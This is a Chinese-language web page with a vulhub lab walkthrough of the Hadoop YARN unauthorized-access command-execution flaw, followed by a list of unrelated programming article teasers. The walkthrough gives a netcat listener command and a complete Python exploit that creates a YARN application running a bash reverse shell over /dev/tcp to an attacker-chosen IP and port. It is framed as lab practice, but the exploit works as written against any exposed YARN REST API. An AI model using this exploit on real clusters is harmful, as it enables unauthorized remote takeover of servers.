当前位置：首页 > news >正文

数据库安全：Hadoop 未授权访问-命令执行漏洞.

news 2025/12/31 8:45:32

数据库安全：Hadoop 未授权访问-命令执行漏洞.

Hadoop 未授权访问主要是因为 Hadoop YARN 资源管理系统配置不当，导致可以未经授权进行访问，从而被攻击者恶意利用。攻击者无需认证即可通过 RESTAPI 部署任务来执行任意指令，最终完全控制服务器。

Hadoop 未授权访问-命令执行漏洞：

开启 vulhub 靶场环境：

第一步：切换到 vulhub 目录下

cd vulhub

第二步：切换到 hadoop 目录下

cd hadoop

第三步：切换到 unauthorized-yarn 漏洞目录下.

第四步：开启漏洞服务.

docker-compose up -d

第五步：访问 http:// (靶场 IP 地址):8088

Hadoop 未授权访问-命令执行漏洞测试：

第一步：访问 /cluster/apps 页面【如果该页面存在的话，说明存在未授权访问漏洞】

http://192.168.0.106:8088/cluster/apps

第二步：在攻击机（kali）设置监听.

nc -nvlp 8888// 设置 监听 端口为8888

第三步：编写 Python 执行代码.

import requestsdef shell(url,vps_ip,port):headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'}response = requests.post(url+"/ws/v1/cluster/apps/new-application",headers=headers)id = response.json()["application-id"]data = {'application-id': id,'application-name': 'getshell','am-container-spec': {'commands': {'command': '/bin/bash -i >& /dev/tcp/%s/%s 0>&1'%(vps_ip,port)},},'application-type': 'YARN'}exploit = requests.post(url+"/ws/v1/cluster/apps",headers=headers,json=data)print("[+] 执行完成！")if __name__ == '__main__':url = input("目标的URL:")vps_ip = input("监听的主机IP地址(kali):")port = input("监听的主机端口(kali):")shell(url,vps_ip,port)

执行代码：

第四步：返回监听的主机查看结果，发现已经成功.

参考文章：Hadoop 漏洞复现_hadoop命令执行漏洞-CSDN博客

学习链接：第55天：服务攻防-数据库安全_Redis_Hadoop_Mysql_未授权访问_RCE_哔哩哔哩_bilibili

数据库安全：Hadoop 未授权访问-命令执行漏洞.

数据库安全：Hadoop 未授权访问-命令执行漏洞. Hadoop 未授权访问主要是因为 Hadoop YARN 资源管理系统配置不当，导致可以未经授权进行访问，从而被攻击者恶意利用。攻击者无需认证即可通过 RESTAPI 部署任务来执行任意指令，最终完…...

编程日记 2023/11/13 23:47:25

前端---认识HTML

文章目录什么是HTML？HTML的读取、运行HTML的标签注释标签标题标签段落标签换行标签格式化标签图片标签a标签表格标签列表标签表单标签form标签input标签文本框单选框复选框普通按钮提交按钮文件选择框 select标签textarea标签特殊标签div标签span标签什么是HTML&a…...

编程日记 2023/11/13 23:46:24

竞赛题目：基于FP-Growth的新闻挖掘算法系统的设计与实现

文章目录 0 前言1 项目背景2 算法架构3 FP-Growth算法原理3.1 FP树3.2 算法过程3.3 算法实现3.3.1 构建FP树 3.4 从FP树中挖掘频繁项集 4 系统设计展示5 最后 0 前言 🔥 优质竞赛项目系列，今天要分享的是基于FP-Growth的新闻挖掘算法系统的设计与实现…...

编程日记 2023/11/13 23:45:22

保姆级jupyter lab配置清单

❤️觉得内容不错的话，欢迎点赞收藏加关注😊😊😊，后续会继续输入更多优质内容❤️ 👉有问题欢迎大家加关注私戳或者评论（包括但不限于NLP算法相关，linux学习相关，读研读博…...

编程日记 2023/11/13 23:44:22

数据结构预算法--链表（单链表，双向链表）

1.链表目录 1.链表 1.1链表的概念及结构 1.2 链表的分类 2.单链表的实现(不带哨兵位） 2.1接口函数 2.2函数的实现 3.双向链表的实现（带哨兵位） 3.1接口函数 3.2函数的实现 1.1链表的概念及结构概念：链表是一种物理存储结…...

编程日记 2023/11/13 23:43:21

数据结构线性表——栈

前言：哈喽小伙伴们，今天我们将一起进入数据结构线性表的第四篇章——栈的讲解，栈还是比较简单的哦，跟紧博主的思路，不要掉队哦。目录一.什么是栈二.如何实现栈三.栈的实现栈的初始化四.栈的操作 1.数据入栈…...

编程日记 2023/11/13 23:42:20

自定义 springboot 启动器 starter 与自动装配原理

Maven 依赖 classpath 类路径管理 Maven 项目中的类路径添加来源分为三类自定义 springboot starter starter 启动器定义的规则自定义 starter 示例自动装配文章链接...

编程日记 2023/11/13 23:41:19

16 _ 二分查找（下）：如何快速定位IP对应的省份地址？

通过IP地址来查找IP归属地的功能，不知道你有没有用过？没用过也没关系，你现在可以打开百度，在搜索框里随便输一个IP地址，就会看到它的归属地。这个功能并不复杂，它是通过维护一个很大的IP地址库来实现的。地址库中包括IP地址范围和归属地的对应关系。当我们想要查询202…...

编程日记 2023/11/13 23:40:17

vb.net圣经带快捷键，用原装的数据库

Imports System.Data.SqlServerCe Imports System.Text.RegularExpressions Imports System.Data.OleDbPublic Class Form1Dim jiuyue As String() {"创", "出", "利", "民", "申", "书", "士", "…...

编程日记 2023/11/13 23:39:15

Unity中Shader的雾效

文章目录前言一、Unity中的雾效在哪开启二、Unity中不同种类雾的区别1、线性雾2、指数雾1（推荐用这个，兼具效果和性能）3、指数雾2（效果更真实，性能消耗多） 三、在我们自己的Shader中实现判断，是…...

编程日记 2023/11/13 23:38:15

企业微信开发教程一：添加企微应用流程图解以及常见问题图文说明

最近在前辈的基础上新添加了一个企微应用，过程中遇到了一些卡点，这里一一通过图片标注与注释的方式记录一下，希望能给后来人提供一些清晰明了的帮助，话不多说，大家直接看图吧。 （文中包括一些本项目独有的配…...

编程日记 2023/11/13 23:37:14

【LeetCode】67. 二进制求和

67. 二进制求和难度：简单题目给你两个二进制字符串 a 和 b ，以二进制字符串的形式返回它们的和。示例 1： 输入:a "11", b "1" 输出："100"示例 2： 输入：a "…...

编程日记 2023/11/13 23:36:12

【LeetCode刷题笔记】二叉树（一）

102. 二叉树的层序遍历解题思路： 1. BFS广度优先遍历，使用队列，按层访问解题思路： 2. 前序遍历，递归，在递归方法参数中，将层索引...

编程日记 2023/11/13 23:35:11

NativeScript开发ios应用，怎么生成测试程序？

在 NativeScript 中，要部署 iOS 应用程序，你需要遵循以下一般步骤： 1、确保开发环境： 确保你的开发环境中已经安装了 Xcode，并且你有一个有效的 Apple 开发者账号。 2、构建 iOS 应用： 在你的 NativeScri…...

编程日记 2023/11/13 23:34:11

Js面试题：说一下js的模块化？

作用： 一个模块就是实现某个特定功能的文件，在文件中定义的变量、函数、类都是私有的，对其他文件不可见。为了解决引入多个js文件时，出现命名冲突、污染作用域等问题 AMD： 浏览器端模块解决方案 AMD即是“异步模块定…...

编程日记 2023/11/13 23:33:10

媒体转码软件Media Encoder 2024 mac中文版功能介绍

Media Encoder 2024 mac是一款媒体转码软件，它可以将视频从一种格式转码为另一种格式，支持H.265、HDR10等多种编码格式，同时优化了视频质量，提高了编码速度。此外，Media Encoder 2024还支持收录、创建代理和输出各种格…...

编程日记 2023/11/13 23:32:09

整治PPOCRLabel中cv2文件读取问题（更新中）

PPOCRLabel 使用PPOCRLabel对ocr预标注结果进行纠正由于PaddleOCR代码库十分混乱,路径经常乱调pip和代码库的代码（pip库和源码冲突）,经常报错，因此paddleocr和ppocrlabel都是使用pip包;PPOCRLabel中使用了cv2进行图片数据的读取，…...

编程日记 2023/11/13 23:31:08

网络运维Day09-补充

文章目录 rsync增量同步scp与rsync的区别rsync常用选项 rsync本地实验rsync远程同步实验练习上传练习下载总结 rsync增量同步 rsync是增量同步的一种工具，可以实现本地目录之间数据同步，也可以实现远程跨主机之间数据同步 scp与rsync的区别 scp属于全…...

编程日记 2023/11/13 23:30:07

【C++】【Opencv】minMaxLoc（）函数详解和示例

minMaxLoc（）函数是 OpenCV 库中的一个函数，用于找到一个多维数组中的最小值和最大值，以及它们的位置。这个函数对于处理图像和数组非常有用。本文通过参数和示例详解，帮助大家理解和使用该函数。参数详解函数原型…...

编程日记 2023/11/13 23:29:06

用Go实现网络流量解析和行为检测引擎

1.前言最近有个在学校读书的迷弟问我:大德德, 有没有这么一款软件, 能够批量读取多个抓包文件,并把我想要的数据呈现出来, 比如:源IP、目的IP、源mac地址、目的mac地址等等。我说：“这样的软件你要认真找真能找出不少开源软件, 但毕竟没有你自己的灵魂在里面,要不…...

编程日记 2023/11/13 23:28:05

LBE-LEX系列工业语音播放器|预警播报器|喇叭蜂鸣器的上位机配置操作说明

LBE-LEX系列工业语音播放器|预警播报器|喇叭蜂鸣器专为工业环境精心打造，完美适配AGV和无人叉车。同时，集成以太网与语音合成技术，为各类高级系统（如MES、调度系统、库位管理、立库等）提供高效便捷的语音交互体验。 L…...

编程新知 2025/12/30 8:16:20

大数据学习栈记——Neo4j的安装与使用

本文介绍图数据库Neofj的安装与使用，操作系统：Ubuntu24.04，Neofj版本：2025.04.0。 Apt安装 Neofj可以进行官网安装：Neo4j Deployment Center - Graph Database & Analytics 我这里安装是添加软件源的方法最新版…...

编程新知 2025/12/28 13:46:14

React hook之useRef

React useRef 详解 useRef 是 React 提供的一个 Hook，用于在函数组件中创建可变的引用对象。它在 React 开发中有多种重要用途，下面我将全面详细地介绍它的特性和用法。基本概念 1. 创建 ref const refContainer useRef(initialValue);initialValu…...

编程新知 2025/6/11 15:21:26

DockerHub与私有镜像仓库在容器化中的应用与管理

哈喽，大家好，我是左手python！ Docker Hub的应用与管理 Docker Hub的基本概念与使用方法 Docker Hub是Docker官方提供的一个公共镜像仓库，用户可以在其中找到各种操作系统、软件和应用的镜像。开发者可以通过Docker Hub轻松获取所…...

编程新知 2025/10/8 10:56:25

1 查询数据库中所有的表空间以及表空间所占空间的大小 SELECTtablespace_name,sum( bytes ) / 1024 / 1024 FROMdba_data_files GROUP BYtablespace_name; 2 Oracle查询表空间大小及每个表所占空间的大小 SELECTtablespace_name,file_id,file_name,round( bytes / ( 1024 …...

编程新知 2025/11/8 0:24:13